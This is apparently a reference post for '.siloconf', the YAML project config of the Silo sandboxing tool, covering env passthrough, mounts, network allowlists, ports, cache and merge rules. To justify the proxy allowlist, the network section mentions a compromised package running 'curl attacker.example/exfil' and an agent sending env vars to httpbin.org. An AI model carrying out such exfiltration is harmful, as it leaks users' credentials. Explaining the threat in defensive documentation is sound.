Understanding .siloconf: where it lives, how it merges, what every field does
A complete reference for Silo's project config file — what belongs in it, what belongs in ~/.silo/siloconf, and the full set of fields with worked examples.
Almost everything Silo does reads from a .siloconf file somewhere. Which project is this? What tools does it need? What env vars can leak into the sandbox? Can npm reach the internet? Which ports?
This post is the complete reference.
What it is, in one paragraph
A .siloconf is a YAML file that describes a project’s Silo environment. It’s the equivalent of .tool-versions (asdf) + .env.example + the engines field of package.json + your firewall rules, all in one place. It’s checked into git. It travels with the repo. When a teammate clones the project and runs silo sync, they get the same tools, same versions, same networking posture you do.
Where to put it
Silo looks for config in three places, in order of increasing specificity:
Tool defaults (registry.yaml, baked into the binary)
↓ overridden by
~/.silo/siloconf (global / user-level — optional)
↓ overridden by
.siloconf (project root — walk-up from cwd)
The most specific source that sets a field wins. Merging happens key by key, not file by file — you can set passEnv globally and overrides.python.ports in the project, and both apply.
.siloconf (project-level)
Drop it at the root of your repo, next to your .git directory or package.json. Silo walks up from your current working directory to find it, so cd src/ and silo run python both see the same config.
Commit this file. It’s the project’s Silo manifest; a teammate’s silo sync relies on it.
~/.silo/siloconf (user/global-level)
Same format; it applies when no project config exists, or merges under one. Put personal preferences here — PYTHONDONTWRITEBYTECODE, a tighter-than-default network allowlist, a bigger cache budget. Nothing project-specific.
Don’t commit this file. It’s yours.
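A sketch of what belongs here, built only from fields covered later in this reference (the specific values are illustrative):

```yaml
# ~/.silo/siloconf -- personal defaults; never committed
passEnv:
  - SENTRY_DSN   # forwarded into every sandbox on this machine

overrides:
  python:
    env:
      PYTHONDONTWRITEBYTECODE: "1"   # personal preference, applies across projects
```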
Tool-level defaults
Registry defaults in internal/tools/registry.yaml set sensible baselines: image, shims, cache mounts, resource limits. You rarely look at these directly. Override specific fields via overrides.<tool>.* in .siloconf.
A complete example
# .siloconf
tools: [python, node]

passEnv:
  - GITHUB_TOKEN
  - DATABASE_URL
  - ANTHROPIC_API_KEY

passFiles:
  - .npmrc
  - .pypirc

mount:
  exclude:
    - node_modules
    - .venv
    - __pycache__
    - .next

overrides:
  node:
    image: docker.io/library/node:20-slim
    network:
      hostAccess: true
      proxy:
        allow:
          - registry.npmjs.org
          - "*.npmjs.org"
          - "*.github.com"
    ports:
      - host: 3000
        guest: 3000
      - host: 5173
        guest: 5173
  python:
    image: docker.io/library/python:3.11-slim
    env:
      PYTHONPATH: /workspace/src
      PYTHONDONTWRITEBYTECODE: "1"
    network:
      hostAccess: true
      proxy:
        allow:
          - pypi.org
          - "*.pythonhosted.org"

cache:
  rootfs:
    maxSizeMB: 16384   # this repo is big, let it use more cache
    maxAgeDays: 90
Every top-level key is optional. A one-tool project only needs a few lines.
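For example, a Python-only project with no network or env needs can get away with a single line:

```yaml
# .siloconf
tools: [python]
```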
Field reference
tools
tools: [python, node]
The set of tools this project expects to have installed. silo sync reads this list, installs anything missing, and warms the rootfs cache for each.
Implicit addition: the keys of overrides: also count. Writing overrides.rust: means this project also needs rust, even if it’s not in tools:.
Omit this whole key and Silo won’t stop you from running anything — it just can’t run silo sync meaningfully.
passEnv
passEnv:
  - GITHUB_TOKEN
  - DATABASE_URL
Whitelist of host env vars forwarded into the sandbox. Everything else is dropped.
This is the sharpest knife in the file. The default is “nothing is passed” — which means a compromised package or a runaway AI agent cannot read your AWS_SECRET_ACCESS_KEY unless you deliberately named it here.
passFiles
passFiles:
  - .npmrc
  - .pypirc
  - ~/.gitconfig
Host files mounted read-only into the VM. Paths with ~ are expanded against the user’s home.
Use this when a tool wants a config file you can’t easily pass as env — npm auth tokens in .npmrc, pypi auth in .pypirc, ssh-style git config, and so on. Read-only by design, so a misbehaving process in the VM can’t corrupt your host file.
mount
mount:
  exclude:
    - node_modules
    - .venv
    - __pycache__
    - .next
    - target   # cargo
    - dist
The project directory is mounted read-write at /workspace/ by default. mount.exclude hides subdirectories from the mount — inside the VM, they don’t exist on the host mount.
Why exclude? Two reasons:
- Performance. Cross-VFS mounts on macOS are slower than native filesystems for workloads with hundreds of thousands of small files (node_modules, large Python caches). Excluding them makes the VM put them on its own ext4 rootfs instead.
- Cleanliness. If you bake deps into the VM with silo build, you don’t want the host node_modules/ shadowing the VM one.
Without any exclusion, everything under the project directory is visible inside the VM.
overrides.<tool>.image
overrides:
  python:
    image: docker.io/library/python:3.11-slim
Replaces the tool’s default OCI image for this project. Any registry + tag that OCI accepts works — official images, distroless, your own mirror, a private registry tag.
This is how version pinning works:
- silo use python@3.11 writes this field automatically.
- You can edit it by hand for tags that aren’t in the built-in registry (alpine, distroless, a company-internal version).
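For instance, pinning to a tag outside the built-in registry is just a hand edit of the same field (the alpine tag here is illustrative, not one the registry ships):

```yaml
overrides:
  python:
    image: docker.io/library/python:3.11-alpine   # hand-picked tag, not in the built-in registry
```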
overrides.<tool>.env
overrides:
  python:
    env:
      PYTHONPATH: /workspace/src
      PYTHONDONTWRITEBYTECODE: "1"
      DATABASE_URL: postgres://host.silo.internal:5432/myapp
Static env vars set inside the VM when this tool runs. Unlike passEnv, these don’t come from the host — they’re literal values defined right here.
Good for:
- Pointing Python at your source layout (PYTHONPATH).
- Opting Node into a specific mode (NODE_ENV=development).
- Telling the tool how to reach the host (host.silo.internal is the hostname of the Mac from inside the VM).
passEnv vs env: passEnv forwards what’s already in your shell; env sets values from scratch in config.
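The distinction, side by side (values illustrative, taken from the examples above):

```yaml
passEnv:
  - GITHUB_TOKEN                    # forwarded: whatever your host shell holds at run time

overrides:
  python:
    env:
      PYTHONPATH: /workspace/src    # set: the literal value written here, host shell irrelevant
```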
overrides.<tool>.network
The network block is opt-in. By default a tool has no network access.
overrides:
  node:
    network:
      hostAccess: true
      proxy:
        allow:
          - registry.npmjs.org
          - "*.github.com"
        deny:
          - "*"
hostAccess: true — enables outbound networking. Without it, the VM has no route to the outside world. It also exposes the host as host.silo.internal inside the VM (useful for hitting your local Postgres, Redis, or a dev API).
proxy.allow — a list of domains the VM is allowed to reach. Wildcards supported (*.npmjs.org). HTTP/HTTPS requests to anything not in the allow-list are blocked by an in-VM proxy.
proxy.deny — explicit deny list. Rarely useful on its own; the default is already “deny everything not in allow.” Use it to carve holes in a wildcard (e.g. allow *.github.com but deny evil.github.com).
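A sketch of that carve-out pattern, reusing the example hostnames above:

```yaml
overrides:
  node:
    network:
      hostAccess: true
      proxy:
        allow:
          - "*.github.com"      # broad wildcard
        deny:
          - evil.github.com     # hole carved out of the wildcard
```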
The allowlist is the whole point of the file. A compromised postinstall can try to curl attacker.example/exfil all it wants — the proxy simply returns “no.” Same for a hallucinated “send my env vars to httpbin.org” from an AI agent.
overrides.<tool>.ports
overrides:
  node:
    ports:
      - host: 3000
        guest: 3000
      - host: 5173
        guest: 5173
Forwards host ports to guest ports. Your dev server at 0.0.0.0:3000 inside the VM becomes reachable at localhost:3000 on the host.
Declaring ports implicitly sets hostAccess: true — you can’t serve traffic without networking.
Shorthand from the CLI: silo config ports add node 3000:3000.
What you can’t override from .siloconf
Registry-level fields — cpus, memoryMB, rootfsSizeMB, requires, shims, cache (the per-tool bind-mount list, not the GC policy block below), workdir, lsp — are baked into the tool’s built-in definition in internal/tools/registry.yaml. The overrides.<tool>.* surface only accepts four keys: image, env, network, ports. Other fields are silently ignored by the parser.
If you need a bigger rootfs or a different dependency graph, the current answer is to edit the registry (or your own fork) and silo install --force; a richer project-level override surface is tracked as an open issue.
cache
cache:
  rootfs:
    maxSizeMB: 8192    # LRU cap (default)
    maxAgeDays: 60     # stale-entry cutoff (default)
  tools:
    maxSizeMB: 4096    # per-tool cache cap
    maxAgeDays: 30
    perMount:
      rust/cargo: 8192 # override for one specific cache mount
Configures disk reclamation policy. Auto-GC runs once per process at the top of every silo run, so these caps quietly shape how much disk Silo holds onto.
In project .siloconf: useful if this project is unusually big (bump) or unusually small (tighten). In ~/.silo/siloconf: sets your personal default across every project.
See silo cache report, silo cache list, silo cache gc for inspecting and forcing reclamation.
Merge behavior in detail
Two files, one example:
# ~/.silo/siloconf (global)
passEnv:
  - SENTRY_DSN

overrides:
  python:
    env:
      PYTHONDONTWRITEBYTECODE: "1"
# .siloconf (project)
tools: [python]
passEnv:
  - GITHUB_TOKEN

overrides:
  python:
    image: docker.io/library/python:3.11-slim
    env:
      PYTHONPATH: /workspace/src
Effective config:
tools: [python]

# Both lists union — neither overrides the other
passEnv:
  - SENTRY_DSN
  - GITHUB_TOKEN

overrides:
  python:
    image: docker.io/library/python:3.11-slim   # project wins (only defined there)
    env:
      PYTHONDONTWRITEBYTECODE: "1"   # global value kept
      PYTHONPATH: /workspace/src     # project value added
Rules per key (from MergeOver in internal/config/project.go):
| Key | Merge behavior |
|---|---|
| tools, passEnv, passFiles | Dedup-union (order preserved) |
| mount (whole block, including exclude) | Replace — project wins if set, else global |
| cache (whole block) | Replace — project wins if set, else global |
| overrides.&lt;tool&gt;.image | Replace scalar (project wins if set) |
| overrides.&lt;tool&gt;.env | Deep-merge per key (project keys win on conflict) |
| overrides.&lt;tool&gt;.network | Replace whole network block, including proxy.allow/deny |
| overrides.&lt;tool&gt;.ports | Replace whole list |
Watch out for mount.exclude: it is not unioned. If your global ~/.silo/siloconf sets mount.exclude: [node_modules] and the project sets mount.exclude: [.venv], the effective value is [.venv] — the whole mount block is replaced. Re-list anything you need to keep.
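Because the whole mount block is replaced, a project that still wants the global exclusions must repeat them (a sketch, continuing the example above):

```yaml
# .siloconf (project)
mount:
  exclude:
    - node_modules   # re-listed from ~/.silo/siloconf; would otherwise be lost
    - .venv          # the project-specific addition
```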
Same goes for network.proxy.allow — a per-tool network block in the project replaces the global one for that tool. If you want layered allowlists today, keep them in one place.
Verify the result:
silo config show
It prints the merged config as YAML, exactly the same shape you’d write by hand.
How to start
- One tool, defaults: you can skip .siloconf entirely and just silo install python. A project-free flow works for scratch scripts.
- One tool, needs network: a few lines are usually enough:

  overrides:
    node:
      network:
        hostAccess: true
        proxy:
          allow: [registry.npmjs.org, "*.npmjs.org"]

- Anything serious: run silo init. It auto-detects tools from marker files (package.json, requirements.txt, Cargo.toml, go.mod, deno.json), asks a few questions, and writes .siloconf. Edit from there.
Why this file exists at all
It comes back to blast radius. The unit of blast radius for Silo is a single run — so the unit of policy has to be a single run too. Which means policy has to live somewhere the runner can find it without you remembering to pass flags. Walk-up discovery of .siloconf is how that works.
The alternative — every silo run takes a dozen flags — would mean every shim invocation, every python you type, every npm install on autopilot, would have to thread policy through by hand. Nobody would do it. The project config file is the thing that makes “good defaults per repo” actually work in practice.
Where to go next
- Python with Silo — the Python-specific shape of .siloconf.
- Node.js with Silo — the Node-specific shape of .siloconf.
- Getting started — if you haven’t installed yet.